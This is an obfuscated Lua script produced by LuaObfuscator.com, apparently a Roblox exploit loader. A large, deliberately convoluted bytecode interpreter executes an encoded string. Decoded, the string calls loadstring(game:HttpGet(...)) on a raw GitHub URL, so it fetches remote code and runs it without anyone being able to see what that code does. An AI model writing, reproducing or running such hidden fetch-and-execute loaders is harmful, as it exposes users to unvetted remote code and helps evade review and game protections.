--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do
	local v0 = tonumber;
	local v1 = string.byte;
	local v2 = string.char;
	local v3 = string.sub;
	local v4 = string.gsub;
	local v5 = string.rep;
	local v6 = table.concat;
	local v7 = table.insert;
	local v8 = math.ldexp;
	local v9 = getfenv or function()
		return _ENV;
	end;
	local v10 = setmetatable;
	local v11 = pcall;
	local v12 = select;
	local v13 = unpack or table.unpack;
	local v14 = tonumber;
	local function v15(v16, v17, ...)
		local v18 = 0;
		local v19;
		local v20;
		local v21;
		local v22;
		local v23;
		local v24;
		local v25;
		local v26;
		local v27;
		local v28;
		local v29;
		local v30;
		while true do
			if (v18 == 5) then
				v27 = v24;
				v28 = nil;
				function v28(...)
					return {...}, v12("#", ...);
				end
				v18 = 6;
			end
			if (v18 == 2) then
				function v22()
					local v31 = v1(v16, v19, v19);
					v19 = v19 + 1;
					return v31;
				end
				v23 = nil;
				function v23()
					local v32, v33 = v1(v16, v19, v19 + (5 - 3));
					v19 = v19 + (5 - 3);
					return (v33 * (493 - 237)) + v32;
				end
				v18 = 3;
			end
			if (v18 == 4) then
				function v25()
					local v34 = v24();
					local v35 = v24();
					local v36 = (4 - 2) - 1;
					local v37 = (v21(v35, 620 - (555 + 64), 951 - (857 + 74)) * (2 ^ 32)) + v34;
					local v38 = v21(v35, 21, 599 - (367 + 201));
					local v39 = ((v21(v35, 959 - (214 + (1317 - 604))) == (1 + 0)) and -(1 + 0)) or 1;
					if (v38 == (877 - ((517 - 235) + 595))) then
						if (v37 == 0) then
							return v39 * (1637 - (1523 + 114));
						else
							local v87 = 0 + 0;
							while true do
								if (v87 == 0) then
									v38 = 1 - 0;
									v36 = 1065 - (68 + 997);
									break;
								end
							end
						end
					elseif (v38 == (3317 - (226 + (1394 - (87 + 263))))) then
						return ((v37 == (0 - (180 - (67 + 113)))) and (v39 * (((87 + 31) - (32 + (208 - 123))) / (0 + 0)))) or (v39 * NaN);
					end
					return v8(v39, v38 - (227 + 796)) * (v36 + (v37 / (2 ^ (1009 - (892 + 65)))));
				end
				v26 = nil;
				function v26(v40)
					local v41;
					if not v40 then
						v40 = v24();
						if (v40 == (0 + 0)) then
							return "";
						end
					end
					v41 = v3(v16, v19, (v19 + v40) - (3 - 2));
					v19 = v19 + v40;
					local v42 = {};
					for v65 = 953 - (802 + 150), #v41 do
						v42[v65] = v2(v1(v3(v41, v65, v65)));
					end
					return v6(v42);
				end
				v18 = 5;
			end
			if (v18 == 6) then
				v29 = nil;
				function v29()
					local v43 = 0;
					local v44;
					local v45;
					local v46;
					local v47;
					local v48;
					local v49;
					local v50;
					while true do
						if (v43 ~= (1483 - (1395 + 87))) then
						else
							v46 = nil;
							v47 = nil;
							v43 = 2;
						end
						if ((1374 - (729 + 645)) ~= v43) then
						else
							v44 = 0;
							v45 = nil;
							v43 = 1;
						end
						if ((394 - (232 + 160)) ~= v43) then
						else
							v48 = nil;
							v49 = nil;
							v43 = 3;
						end
						if (v43 ~= (4 - 1)) then
						else
							v50 = nil;
							while true do
								local v88 = 0 + 0;
								local v89;
								while true do
									if (v88 ~= 0) then
									else
										v89 = 1277 - (37 + 1240);
										while true do
											if (v89 ~= (561 - (306 + 254))) then
											else
												if (v44 == (11 - 8)) then
													local v119 = 0 + 0;
													while true do
														if (v119 ~= 0) then
														else
															local v141 = 0 - 0;
															while true do
																if (v141 ~= (0 - 0)) then
																else
																	for v151 = 1, v24() do
																		v46[v151 - 1] = v29();
																	end
																	return v48;
																end
															end
														end
													end
												end
												if (v44 == (1 + 0)) then
													local v120 = 0 + 0;
													while true do
														if (v120 ~= (0 - 0)) then
														else
															v48 = {v45,v46,nil,v47};
															v49 = v24();
															v120 = 1;
														end
														if (v120 ~= (573 - (426 + 146))) then
														else
															v50 = {};
															v44 = 1 + 1;
															break;
														end
													end
												end
												break;
											end
											if (v89 ~= (0 + 0)) then
											else
												local v97 = 1456 - (282 + 1174);
												while true do
													if (v97 == (1475 - (1329 + 145))) then
														v89 = 812 - (569 + 242);
														break;
													end
													if (v97 ~= (0 - 0)) then
													else
														if (v44 == (0 + 0)) then
															local v142 = 0;
															while true do
																if (0 ~= v142) then
																else
																	v45 = {};
																	v46 = {};
																	v142 = 1;
																end
																if (v142 ~= (1025 - (706 + 318))) then
																else
																	v47 = {};
																	v44 = 1;
																	break;
																end
															end
														end
														if (v44 == (973 - (140 + 831))) then
															local v143 = 1850 - (1409 + 441);
															local v144;
															while true do
																if (v143 ~= (1271 - (945 + 326))) then
																else
																	v144 = 718 - (15 + 703);
																	while true do
																		if (v144 ~= (0 + 0)) then
																		else
																			local v153 = 0 - 0;
																			while true do
																				if (v153 ~= (439 - (262 + 176))) then
																				else
																					v144 = 701 - (271 + 429);
																					break;
																				end
																				if (v153 == (1721 - (345 + 1376))) then
																					for v160 = 689 - (198 + 490), v49 do
																						local v161 = 0;
																						local v162;
																						local v163;
																						local v164;
																						while true do
																							if (v161 == 1) then
																								v164 = nil;
																								while true do
																									if ((0 - 0) == v162) then
																										local v166 = 0 - 0;
																										local v167;
																										while true do
																											if (v166 == (1500 - (1408 + 92))) then
																												v167 = 0;
																												while true do
																													if (v167 == (1207 - (696 + 510))) then
																														v162 = 1 - 0;
																														break;
																													end
																													if (v167 == (1262 - (1091 + 171))) then
																														local v176 = 0 + 0;
																														while true do
																															if (v176 ~= (1171 - (418 + 753))) then
																															else
																																v163 = v22();
																																v164 = nil;
																																v176 = 1 + 0;
																															end
																															if (v176 ~= (1 + 0)) then
																															else
																																v167 = 1 + 0;
																																break;
																															end
																														end
																													end
																												end
																												break;
																											end
																										end
																									end
																									if (v162 ~= (1 + 0)) then
																									else
																										if (v163 == (3 - 2)) then
																											v164 = v22() ~= 0;
																										elseif (v163 == 2) then
																											v164 = v25();
																										elseif (v163 == (1772 - (1749 + 20))) then
																											v164 = v26();
																										end
																										v50[v160] = v164;
																										break;
																									end
																								end
																								break;
																							end
																							if (v161 ~= (0 - 0)) then
																							else
																								v162 = 374 - (123 + 251);
																								v163 = nil;
																								v161 = 4 - 3;
																							end
																						end
																					end
																					v48[701 - (208 + 490)] = v22();
																					v153 = 1 + 0;
																				end
																			end
																		end
																		if (v144 == (1 + 0)) then
																			for v154 = 1, v24() do
																				local v155 = 836 - (660 + 176);
																				local v156;
																				local v157;
																				local v158;
																				while true do
																					if (v155 == (1 + 0)) then
																						v158 = nil;
																						while true do
																							if ((202 - (14 + 188)) == v156) then
																								local v165 = 0;
																								while true do
																									if ((676 - (534 + 141)) == v165) then
																										v156 = 1 + 0;
																										break;
																									end
																									if (v165 == 0) then
																										v157 = 0 + 0;
																										v158 = nil;
																										v165 = 1;
																									end
																								end
																							end
																							if ((2 - 1) == v156) then
																								while true do
																									if (v157 == (0 + 0)) then
																										v158 = v22();
																										if (v21(v158, 1, 1 - 0) ~= (0 - 0)) then
																										else
																											local v169 = 0 - 0;
																											local v170;
																											local v171;
																											local v172;
																											while true do
																												if (v169 == 2) then
																													if (v21(v171, 2 - 1, 1 + 0) ~= 1) then
																													else
																														v172[2 + 0] = v50[v172[398 - (115 + 281)]];
																													end
																													if (v21(v171, 4 - 2, 2 + 0) == (2 - 1)) then
																														v172[10 - 7] = v50[v172[3]];
																													end
																													v169 = 3 + 0;
																												end
																												if (v169 ~= (870 - (550 + 317))) then
																												else
																													if (v21(v171, 3 - 0, 3 - 0) == (2 - 1)) then
																														v172[289 - (134 + 151)] = v50[v172[170 - (122 + 44)]];
																													end
																													v45[v154] = v172;
																													break;
																												end
																												if (v169 == (0 - 0)) then
																													local v174 = 0;
																													local v175;
																													while true do
																														if (v174 == (1665 - (970 + 695))) then
																															v175 = 0 - 0;
																															while true do
																																if (v175 ~= (1991 - (582 + 1408))) then
																																else
																																	v169 = 1 + 0;
																																	break;
																																end
																																if (v175 ~= (0 + 0)) then
																																else
																																	v170 = v21(v158, 3 - 1, 68 - (30 + 35));
																																	v171 = v21(v158, 3 + 1, 6);
																																	v175 = 1;
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (v169 ~= (3 - 2)) then
																												else
																													v172 = {v23(),v23(),nil,nil};
																													if (v170 == 0) then
																														local v183 = 0;
																														local v184;
																														while true do
																															if (v183 == (0 - 0)) then
																																v184 = 241 - (187 + 54);
																																while true do
																																	if (0 ~= v184) then
																																	else
																																		v172[1215 - (323 + 889)] = v23();
																																		v172[784 - (162 + 618)] = v23();
																																		break;
																																	end
																																end
																																break;
																															end
																														end
																													elseif (v170 == (1 + 0)) then
																														v172[3] = v24();
																													elseif (v170 == 2) then
																														v172[2 + 1] = v24() - (2 ^ (33 - 17));
																													elseif (v170 == 3) then
																														local v189 = 0 - 0;
																														local v190;
																														local v191;
																														local v192;
																														while true do
																															if (v189 ~= (0 + 0)) then
																															else
																																v190 = 0;
																																v191 = nil;
																																v189 = 983 - (18 + 964);
																															end
																															if (v189 == (1637 - (1373 + 263))) then
																																v192 = nil;
																																while true do
																																	if (v190 ~= (1000 - (451 + 549))) then
																																	else
																																		local v193 = 0 + 0;
																																		while true do
																																			if (v193 ~= 1) then
																																			else
																																				v190 = 1 + 0;
																																				break;
																																			end
																																			if (v193 == 0) then
																																				v191 = 0 + 0;
																																				v192 = nil;
																																				v193 = 1;
																																			end
																																		end
																																	end
																																	if (v190 == 1) then
																																		while true do
																																			if (v191 == (0 - 0)) then
																																				v192 = 0 - 0;
																																				while true do
																																					if (v192 ~= (126 - (116 + 10))) then
																																					else
																																						v172[3] = v24() - (2 ^ (1400 - (746 + 638)));
																																						v172[4] = v23();
																																						break;
																																					end
																																				end
																																				break;
																																			end
																																		end
																																		break;
																																	end
																																end
																																break;
																															end
																														end
																													end
																													v169 = 2;
																												end
																											end
																										end
																										break;
																									end
																								end
																								break;
																							end
																						end
																						break;
																					end
																					if (v155 ~= (0 + 0)) then
																					else
																						v156 = 0;
																						v157 = nil;
																						v155 = 1;
																					end
																				end
																			end
																			v44 = 6 - 3;
																			break;
																		end
																	end
																	break;
																end
															end
														end
														v97 = 1;
													end
												end
											end
										end
										break;
									end
								end
							end
							break;
						end
					end
				end
				v30 = nil;
				v18 = 7;
			end
			if (v18 == 0) then
				v19 = 1;
				v20 = nil;
				v16 = v4(v3(v16, 5), "..", function(v51)
					if (v1(v51, 2) == 79) then
						local v81 = 0;
						while true do
							if (v81 == 0) then
								v20 = v0(v3(v51, 1, 1));
								return "";
							end
						end
					else
						local v82 = v2(v0(v51, 16));
						if v20 then
							local v90 = v5(v82, v20);
							v20 = nil;
							return v90;
						else
							return v82;
						end
					end
				end);
				v18 = 1;
			end
			if (v18 == 3) then
				v24 = nil;
				function v24()
					local v52, v53, v54, v55 = v1(v16, v19, v19 + 1 + 2);
					v19 = v19 + 3 + (1552 - (1126 + 425));
					return (v55 * (6039236 + (10738385 - (118 + 287)))) + (v54 * (172692 - 107156)) + (v53 * (656 - 400)) + v52;
				end
				v25 = nil;
				v18 = 4;
			end
			if (v18 == 7) then
				function v30(v56, v57, v58)
					local v59 = v56[1];
					local v60 = v56[2];
					local v61 = v56[3];
					return function(...)
						local v67 = v59;
						local v68 = v60;
						local v69 = v61;
						local v70 = v28;
						local v71 = 1;
						local v72 = -1;
						local v73 = {};
						local v74 = {...};
						local v75 = v12("#", ...) - 1;
						local v76 = {};
						local v77 = {};
						for v83 = 0, v75 do
							if (v83 >= v69) then
								v73[v83 - v69] = v74[v83 + 1];
							else
								v77[v83] = v74[v83 + 1];
							end
						end
						local v78 = (v75 - v69) + 1;
						local v79;
						local v80;
						while true do
							local v84 = 0;
							while true do
								if (1 == v84) then
									if (v80 <= 3) then
										if (v80 <= 1) then
											if (v80 > 0) then
												do
													return;
												end
											else
												local v98 = v79[2];
												local v99, v100 = v70(v77[v98](v13(v77, v98 + 1, v79[3])));
												v72 = (v100 + v98) - 1;
												local v101 = 0;
												for v121 = v98, v72 do
													local v122 = 0;
													while true do
														if (v122 == 0) then
															v101 = v101 + 1;
															v77[v121] = v99[v101];
															break;
														end
													end
												end
											end
										elseif (v80 == 2) then
											v77[v79[2]]();
										else
											local v102 = v79[2];
											v77[v102] = v77[v102](v13(v77, v102 + 1, v72));
										end
									elseif (v80 <= 5) then
										if (v80 > 4) then
											local v104 = 0;
											local v105;
											local v106;
											local v107;
											local v108;
											local v109;
											while true do
												if (v104 == 3) then
													v79 = v67[v71];
													v77[v79[2]] = v79[3];
													v71 = v71 + 1;
													v79 = v67[v71];
													v109 = v79[2];
													v104 = 4;
												end
												if (v104 == 2) then
													v109 = v79[2];
													v108 = v77[v79[3]];
													v77[v109 + 1] = v108;
													v77[v109] = v108[v79[4]];
													v71 = v71 + 1;
													v104 = 3;
												end
												if (v104 == 5) then
													v79 = v67[v71];
													v109 = v79[2];
													v77[v109] = v77[v109](v13(v77, v109 + 1, v72));
													v71 = v71 + 1;
													v79 = v67[v71];
													v104 = 6;
												end
												if (v104 == 4) then
													v106, v107 = v70(v77[v109](v13(v77, v109 + 1, v79[3])));
													v72 = (v107 + v109) - 1;
													v105 = 0;
													for v147 = v109, v72 do
														local v148 = 0;
														while true do
															if (v148 == 0) then
																v105 = v105 + 1;
																v77[v147] = v106[v105];
																break;
															end
														end
													end
													v71 = v71 + 1;
													v104 = 5;
												end
												if (v104 == 0) then
													v105 = nil;
													v106, v107 = nil;
													v108 = nil;
													v109 = nil;
													v77[v79[2]] = v58[v79[3]];
													v104 = 1;
												end
												if (v104 == 6) then
													v77[v79[2]]();
													v71 = v71 + 1;
													v79 = v67[v71];
													do
														return;
													end
													break;
												end
												if (v104 == 1) then
													v71 = v71 + 1;
													v79 = v67[v71];
													v77[v79[2]] = v58[v79[3]];
													v71 = v71 + 1;
													v79 = v67[v71];
													v104 = 2;
												end
											end
										else
											v77[v79[2]] = v79[3];
										end
									elseif (v80 > 6) then
										v77[v79[2]] = v58[v79[3]];
									else
										local v114 = v79[2];
										local v115 = v77[v79[3]];
										v77[v114 + 1] = v115;
										v77[v114] = v115[v79[4]];
									end
									v71 = v71 + 1;
									break;
								end
								if (v84 == 0) then
									v79 = v67[v71];
									v80 = v79[1];
									v84 = 1;
								end
							end
						end
					end;
				end
				return v30(v29(), {}, v17)(...);
			end
			if (v18 == 1) then
				v21 = nil;
				function v21(v62, v63, v64)
					if v64 then
						local v85 = (v62 / ((7 - 5) ^ (v63 - (1122 - (118 + 1003))))) % ((5 - 3) ^ (((v64 - ((375 + 3) - (142 + 235))) - (v63 - (4 - 3))) + 1 + 0));
						return v85 - (v85 % (978 - (553 + 247 + 177)));
					else
						local v86 = (3 - 1) ^ (v63 - 1);
						return (((v62 % (v86 + v86)) >= v86) and 1) or (0 + 0);
					end
				end
				v22 = nil;
				v18 = 2;
			end
		end
	end
	v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403583O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526F626C6F7849444775626B756B2F736E6A646A736E646D646B2O642F6D61696E2F5072656D696D416E6A736A736E736A66616A2O7300083O0012053O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00", v9(), ...);
end
